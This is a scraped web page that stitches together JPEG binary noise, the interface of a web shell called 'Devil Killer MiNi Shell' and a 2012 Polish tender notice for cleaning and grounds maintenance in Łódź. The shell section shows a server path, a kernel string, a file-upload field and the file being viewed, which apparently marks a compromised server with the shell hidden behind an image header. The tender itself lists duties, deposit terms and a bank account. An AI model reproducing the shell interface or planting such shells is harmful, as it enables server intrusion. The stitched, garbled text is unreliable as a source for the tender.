JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121126/249143-N-2012.html

<p class="kh_header"><b>Łódź: Przetarg ZP/13/2012 

NA 
Świadczenie usług należytego utrzymania stanu sanitarno - porządkowego nieruchomości wraz z terenami przynależnymi OBSZAR II pow. ekspl. wew. 11 843,62 m2 pow. ekspl. zew. 40 982,90 m2 pow. terenów zielonych 13 873,34 m2 pow. okien i luksfer. 916,32 m2, utrzymanie czystości w siedzibie Zleceniodawcy pow. wew. 406,46 m2 pow. okien 106,56 m2 wraz z archiwum pow. wew. 82 m2 okna 5 m2</b><br>
<b>Numer ogłoszenia: 249143 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Bałuty "Bałuty Nowe" , ul. Sędziowska 16, 91-304 Łódź, woj. łódzkie, tel. 42 6546896, faks 42 6546896.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.balutynowe.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg ZP/13/2012 

NA 
Świadczenie usług należytego utrzymania stanu sanitarno - porządkowego nieruchomości wraz z terenami przynależnymi OBSZAR II pow. ekspl. wew. 11 843,62 m2 pow. ekspl. zew. 40 982,90 m2 pow. terenów zielonych 13 873,34 m2 pow. okien i luksfer. 916,32 m2, utrzymanie czystości w siedzibie Zleceniodawcy pow. wew. 406,46 m2 pow. okien 106,56 m2 wraz z archiwum pow. wew. 82 m2 okna 5 m2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKRES RZECZOWY ZAMÓWIENIA: 
świadczenie usług należytego utrzymania stanu sanitarno-porządkowego posesji wraz z terenami przynależnymi.
Zakres rzeczowy zamówienia obejmuje następujące prace:
A. bieżące czynności podstawowe
1.	bieżące usuwanie/zamiatanie, zbieranie, zmywanie odpadów i innych zanieczyszczeń z pomieszczeń i urządzeń budynku przeznaczonych do ogólnego użytku: korytarze, klatki schodowe, sienie, kabiny dźwigowe, WC, pralnie, suszarnie, strychy itp.
2.	bieżące usuwanie odpadów i innych zanieczyszczeń poprzez grabienie, zamiatanie z niezabudowanych części nieruchomości tj. podwórzy, przejść, bram, chodników, trawników, opasek ochronnych i jezdni osiedlowych. Mycie chodników w zależności od potrzeb.
3.	Zleceniobiorca zobowiązany jest wywieźć własnym transportem i na własny koszt odpady nie nadające się do składowania w pojemnikach na śmieci /tzn. liście, gałęzie i inne nieczystości nie będące odpadami komunalnymi wielkogabarytowymi/.
4.        Zleceniobiorca zobowiązany jest do ustawienia w rejonie 15 sztuk koszy w miejscu wskazanym przez Zleceniodawcę , oznaczonych nalepką w kolorze pomarańczowym przeznaczonych na psie nieczystości. Zobowiązany jest do wykładania  koszy workami foliowymi  a także ich bieżącego opróżniania (w zależności od potrzeb, min. 1 raz w tygodniu
5.        Zleceniobiorca zobowiązany jest do ustawienia 15 szt. koszy ulicznych w miejscu wskazanym przez Zleceniodawcę na odpady stałe w kolorze niebieskim. Zobowiązany jest do bieżącego wykładania  koszy workami foliowymi  a także ich opróżniania. Zakup worków należy do obowiązków Zleceniobiorcy.
B.	bieżące sprzątanie w okresie zimy - polegające na
1.	usuwaniu śniegu, lodu, błota z chodników, dojść, dojazdów do garaży, ulic osiedlowych, placów zabaw, parkingów osiedlowych, oczyszczanie pokryw studzienek telefonicznych, kanalizacyjnych oraz udrażnianie /odśnieżanie, odkuwanie lodu/ studzienek ściekowych. Czynności te powinny być wykonane do godz. 6.30 rano.
2.	w przypadku opadów śniegu lub oblodzenia praca powinna być wykonana systematycznie na bieżąco, aż do osiągnięcia stanu zapewniającego bezpieczeństwo poruszających się ludzi i pojazdów.
3.        w przypadku wystąpienia gołoledzi wymagane jest posypywanie piaskiem w celu utrzymania szorstkiej nawierzchni bez użycia soli i innych środków chemicznych. Zakup piasku należy do obowiązków Zleceniobiorcy.
4.        usuwaniu sopli z dachów. Koszty użycia sprzętu specjalistycznego obciążają Zleceniodawcę.
C.	bieżące sprzątanie - konserwacja terenów zielonych poprzez grabienie, rekultywacja i odtwarzanie  zniszczonych części trawników i kwietników, podlewanie nowych nasadzeń,  sianie trawy i jej koszenie w zależności od potrzeb Zleceniodawcy (w okresie maj - wrzesień).
           Wywożenie skoszonej trawy w workach foliowych winno odbywać się niezwłocznie po zakończeniu koszenia. Zleceniobiorca winien mieć zawartą umowę z firmą świadczącą usługi  kompostowania. 
Zakup nasion trawy należy do obowiązków Zleceniobiorcy.

D.      w zakresie prac wewnątrz budynków oraz mycia elementów stałych budynków z częstotliwością zapewniającą należyty stan sanitarny i porządkowy
1.	mycie klatek schodowych, lamperii, balustrad, drzwi, skrzynek listowych i liczników.
2.        dwa razy w trakcie trwania umowy (kwiecień, grudzień) mycie okien i luksferów na klatkach schodowych i w pomieszczeniach ogólnego użytku /pralnie, suszarnie itp./
3.	wykonywanie czynności związanych z dezynfekcją, dezynsekcją i deratyzacją pomieszczeń, urządzeń oraz terenu nieruchomości przeznaczonych do wspólnego użytku. Zakup środków należy do obowiązków Zleceniobiorcy.
4.        obowiązkowe przeprowadzanie prewencyjnej deratyzacji w terminach:
           20 marzec - 20 kwiecień  oraz  15 październik - 15 listopad
5.        oznakowanie miejsc wyłożenia trutek oraz zabezpieczenie przed dostępem do nich dzieci, ptactwa i zwierząt
E.	W zakresie prac ogólno-porządkowych :
1.	dokonywanie codziennego przeglądu obsługiwanego terenu ze szczególnym uwzględnieniem: 
a)	- właściwego wykonywania zadań wynikających z przyjętych obowiązków,
b)	- terminowego wykonywania świadczeń wynikających z umów zawartych z usługodawcami
2.	niezwłoczne zawiadamianie Zleceniodawcy o dostrzeżonych uszkodzeniach lub wadliwym działaniu instalacji i urządzeń technicznych znajdujących się na terenie nieruchomości.
3.	zgłaszanie potrzeb dotyczących renowacji zieleni oraz przycinania i wycięcia drzew.
4.	udział w okresowych kontrolach sanitarno-porządkowych organizowanych na terenie objętym umową oraz wykonywanie zaleceń wynikających z tych kontroli.
5.	bezzwłoczne wywieszanie dostarczonych przez Zleceniodawcę informacji w gablotach na klatkach schodowych oraz dopilnowanie ich utrzymania.
6.	terminowe doręczanie Najemcom lokali mieszkalnych i użytkowych oraz użytkownikom zawiadomień o zmianach stawek czynszowych, książeczek czynszowych, powiadomień o konieczności wnoszenia dopłat bądź potrąceń bonifikat za zimną wodę, powiadomień o stanie konta najemcy, upomnień o zaległościach czynszowych i wynikających z innych tytułów w terminie 7 dni od daty przejęcia dokumentów od Zleceniodawcy.
7.	terminowe wywieszanie flag państwowych, papieskich i miejskich, w dniach świąt i uroczystości państwowych na terenie wszystkich nieruchomości; zakup flag należy do obowiązków Zleceniobiorcy.
8.	bieżąca wymiana uszkodzonych żarówek w klatkach schodowych i korytarzach w posesjach objętych umową; zakup żarówek należy do obowiązków Zleceniobiorcy.
9.	bieżące usuwanie z budynków oraz pomieszczeń i urządzeń przeznaczonych do wspólnego użytku ogłoszeń, plakatów, afiszy, napisów, rysunków umieszczonych bez zgody Zleceniodawcy.
10.	bieżące opróżnianie koszy przydomowych i ich odkażanie.
11.	bieżące odkażanie dołów kloacznych, ubikacji oraz rynsztoków podwórzowych i ulicznych wapnem chlorowanym lub lizolem; zakup środków chemicznych należy do Zleceniobiorcy.
12.	bieżące mycie i dezynfekowanie pergoli i zsypów, utrzymanie drożności zsypów.
13.	terminowe wystawianie pojemników na śmieci w miejsce dostępne dla odbiorców śmieci oraz ich wstawianie do pergoli, zsypów i innych miejsc do tego wyznaczonych z częstotliwością wskazaną przez Zleceniodawcę.
14.	zabezpieczanie grzejników na parterach budynków, rur wodociągowych w ubikacjach ogólnych oraz hydrantów - zdrojów podwórzowych na okres zimy; zakup materiałów niezbędnych do tego celu należy do obowiązków Zleceniobiorcy.
15.	Dbanie o należyty stan tablic ogłoszeniowych umieszczonych na zewnątrz budynków, przynajmniej raz w tygodniu zdejmowanie nieaktualnych ogłoszeń, w razie uszkodzeń tablic zgłaszanie tego faktu do Zleceniodawcy.
F.  Utrzymanie czystości i porządku w budynku przy ul. Sędziowskiej 16 będącym siedzibą      
     Zleceniodawcy o powierzchni wewnętrznej 406,46 m2 , okna o powierzchni 106,56 m2   
     wraz z archiwum pow. wew.82 m2, okna 5 m2
1.	Sprzątanie nieruchomości odbywać się będzie w dni robocze w godzinach   
popołudniowych po godzinie 1700 
2.	Do obowiązków Zleceniobiorcy w ramach codziennego sprzątania biura należy: opróżnianie koszy na śmieci i wykładania ich workami foliowymi, zamiatanie, zbieranie nieczystości z powierzchni wewnętrznych, mycie podłóg, mycie na mokro i dezynfekcja sedesów, umywalek i baterii oraz przylegającej glazury, kontrola zużycia i ewentualna wymiana kostki WC, uzupełnianie dozowników na mydło, uzupełnianie ręczników i papieru toaletowego, mycie na mokro i polerowanie lusterek, odkurzanie wykładzin dywanowych, usuwanie kurzu z powierzchni meblowych.
3.	Do obowiązków Zleceniobiorcy w ramach miesięcznego sprzątania biura należy: 
mycie ścian malowanych farbą olejną lub wyłożonych glazurą oraz kaloryferów, mycie koszy na śmieci, mycie parapetów, mycie na mokro drzwi wewnętrznych, wyłączników światła, dezynfekcja aparatów telefonicznych, mycie poręczy na klatkach schodowych.
4.	Do obowiązków Zleceniobiorcy w ramach półrocznego sprzątania biura należy:
mycie okien i stolarki okiennej, mycie krat, mycie na mokro żyrandoli oświetleniowych, pranie firanek (zdjęcie i zawieszenie), utrzymanie czystości w archiwum Zamawiającego poprzez odkurzanie na sucho dokumentacji nie naruszając jego stanu pierwotnego, mycie na mokro regałów , zamiatanie i mycie podłóg na mokro, mycie okienek .
5.	Zakup środków i narzędzi należy do obowiązków Zleceniobiorcy.
6.	Zleceniobiorca jest zobowiązany do przekazania Zleceniodawcy, najpóźniej w pierwszym dniu realizacji umowy, danych  pracownika  zajmującego się sprzątaniem siedziby Zleceniodawcy , a w przypadku zaistnienia zmian do ich aktualizacji.
7.	Zleceniobiorca jest zobowiązany po zakończeniu prac do zamykania drzwi zewnętrznych i załączania systemu alarmowego.
8.	Zleceniobiorca zobowiązuje się do zachowania tajemnicy wszelkich informacji dotyczących działalności Zleceniodawcy w szczególności dotyczących systemu zabezpieczeń, przedmiotów i urządzeń znajdujących się w pomieszczeniach, o których dowiedział się w trakcie realizacji umowy, jak również do pozostawienia w stanie nienaruszonym wszelkich materiałów, z którymi z racji wykonywania umowy mógłby się zetknąć.  

Niniejszym postępowaniem objęty jest obszar o powierzchni ogółem:
eksploatacyjna wewnętrzna		11 843,62 m2 
eksploatacyjna zewnętrzna		40 982,90 m2
tereny zielone				13 873,34 m2
okna i luksfery			              916,32 m2
Utrzymanie czystości w siedzibie Zleceniodawcy pow. wew. 406,46 m2, pow. okien 106,56 m2 wraz z archiwum pow. wew. 82 m2, okna 5 m2 
Dokładne adresy posesji wymienione są w załączniku Nr 3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.62.00.00-9, 90.91.13.00-9, 90.91.12.00-8, 90.92.10.00-9, 90.91.92.00-4, 90.92.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium jest warunkiem ważności oferty. Wysokość wadium w niniejszym postępowaniu
        wynosi: 4 000,00 zł (słownie: cztery tysiące zł )                 
2.   Wykonawca wnosi wadium (winno być na koncie Zleceniodawcy)  przed upływem  
        terminu składania ofert, o którym mowa w pkt 14.2 W SIWZ
3.   Wadium może być wniesione w:
                 3.1. pieniądzu;
                   3.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
                           kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
                 3.3  gwarancjach ubezpieczeniowych;
                 3.4. gwarancjach bankowych;
                  3.5. poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2
                          Ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju  
                          Przedsiębiorczości (Dz. U. nr 109, poz. 1158, z późn. zm.)                
4.   Wadium wnoszone w pieniądzu należy wpłacać przelewem na konto:
                  GETIN BANK S.A.
                  Oddział Regionalny GETIN BIZNES w Łodzi
                  98 1560 0013 2027 2236 9637 0005
                  z zaznaczeniem: wadium - przetarg  ZP/13/2012 
         5   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na                  
                 wezwanie, o których mowa w art. 26 ust. 3 Pzp, nie złoży dokumentów lub oświadczeń  
               o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba że udowodni, że   
               wynika to z przyczyn  nie leżących po jego stronie art.46 ust 4a Pzp
	6   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta
                 została wybrana:
             6.1)  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
                       określonych w ofercie 
             6.2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z   
                       przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy, że spełnia warunki wymagane art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 1 DO SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzeniem będzie wykaz    
                  wykonanych usług w zakresie niezbędnym do wykazania spełnienia warunku  
                  wiedzy i doświadczenia będzie jeżeli Wykonawca wykaże że w okresie   
                ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres  
                prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich 
                  wartości, przedmiotu, dat wykonywania i odbiorców, oraz załączeniem 
                  dokumentu potwierdzającego, że te usługi zostały wykonane lub są  
                    wykonywane należycie (świadczenie ciągłe min jedna (1) usługa polegająca na   
                    przedmiocie zamówienia na wartość minimum 150 000zł brutto każda przez 
                  12 miesięcy) (załącznik nr 6 DO SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenie:     
                  Wykaz narzędzi Załącznik nr 7 DO SIWZ)
                              WYMAGANIA ZAMAWIAJĄCEGO:
                              Wykonawca powinien dysponować minimum:
Kosiarki - 6 szt.
Ciągnik dwuosiowy z przyczepą lub samochód ciężarowy - 1 szt.
Urządzenie z pługiem do odśnieżania - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenie:
                           wykaz osób Załącznik 8 DO SIWZ)  
                              WYMAGANIA ZAMAWIAJĄCEGO:
                              Wymagana minimalna liczba pracowników: 
 -  10 pracowników w tym jedna osoba posiadająca kwalifikacje w zakresie prowadzenia prac ogrodniczych i 1 osoba posiadająca kwalifikacje w zakresie wykonywania dezynfekcji, dezynsekcji i deratyzacji. Wykonawca złoży oświadczenie, ze w/w osoby posiadają wymagane uprawnienia ogrodnicze i kwalifikacje w zakresie dezynfekcji, dezynsekcji i deratyzacji  (oświadczenie wykonawcy załącznik nr 10 DO SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>kserokopia opłaconej polisy a w  
                            przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest   
                         ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
                         działalności związanej z przedmiotem zamówienia na kwotę 
                          minimum 150 000 zł. Jeżeli w trakcie realizacji umowy polisa straci ważność,        
                           Zamawiający będzie żądał przedłożenia kserokopii nowej polisy potwierdzonej  
                        za zgodność z oryginałem.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz oferty (Załącznik Nr 4 DO SIWZ)
Wypełniony Formularz cenowy (Załącznik Nr 5 DO SIWZ) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. w formie spółki cywilnej). Dowód wniesienia wadium
Pełnomocnictwo do podpisania oferty i/lub umowy (jeżeli dotyczy).
Podpisany wzór umowy  (Załącznik nr 9 DO SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1  Istotne postanowienia , które zostaną wprowadzone do umowy oraz wszystkie   przyszłe zobowiązania wykonawcy zostały przedstawione we wzorze umowy (załącznik nr 9 DO SIWZ)
2   Wykonawcy występujący wspólnie (np. w formie spółki cywilnej) ponoszą solidarną odpowiedzialność za wykonanie umowy.
3   Zamawiający przewiduje istotne zmiany postanowień zawieranej umowy w stosunku 
         do treści oferty, na podstawie której dokonano wyboru wykonawcy:

1  Zmianę okresu obowiązywania umowy z powodu okoliczności nieznanych  
              stronom w chwili zawarcia umowy.
2   Zmian podmiotowych po stronie Wykonawcy zgodnie z obowiązującymi  
              przepisami prawa.
3  Zmianę obsługiwanych nieruchomości wynikającą z przyczyn niezależnych od    
              Zleceniodawcy i nie znaną w chwili zawarcia umowy (np. zmiana stanu prawnego    
                        nieruchomości itp.)
4  Zmianę powierzchni obsługiwanych nieruchomości.
5  Zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, na   
              potrzeby  niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec  
              łączącej strony więzi prawnej:
o charakterze niezależnym od stron,
którego strony nie mogły przewidzieć przed zawarciem umowy,
którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności,
której nie można przypisać drugiej stronie;
	Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.balutynowe.com3.pl<br>
